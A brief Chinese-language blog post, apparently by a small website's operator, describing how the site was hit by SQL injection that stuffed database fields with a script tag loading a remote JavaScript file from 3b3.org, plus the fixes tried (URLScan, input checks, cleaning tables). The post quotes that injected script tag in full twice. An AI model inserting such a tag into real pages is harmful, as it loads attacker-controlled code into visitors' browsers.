不知道是樹大招風還是怎麼了
明明三助網的流量也不是很大… 怎麼會中獎了捏!
有不少欄位被灌入<script   src=http://3b3.org/c.js> </script>
不然就是被莫名奇妙的加了一、二張資料表

三助網不過就是辦個抽獎活動而已嘛…
怎麼就……… 唉唉

但是…說真的,本網站大概真有不少大大小小的漏洞吧!
雖然現在裝了URLSCAN,也在各個TEXTBOX加上判斷
針對目前所有有問題的資料表進行醫治

可是目前還是有不少網頁會有問題
也只能先靠 ERROR 404 先蓋起來了…
希望可以順利渡過這一次的難關

各位朋友呀~ 請多加小心留意… >"<

 

參考資料:

解决&quot; &lt;&nbsp;src=http://3b3.org/c.js&gt; &lt;/script&gt; &quot;SQL注入方法

游擊式的SQL Injection攻擊

IIS 安全性延伸模組 URLScan 3 進階應用 - 自訂規則清單

<script src=http://3b3.org/c.js> </script> 攻擊

 

arrow
arrow
    全站熱搜

    ⒶⓂⓎ 發表在 痞客邦 留言(0) 人氣()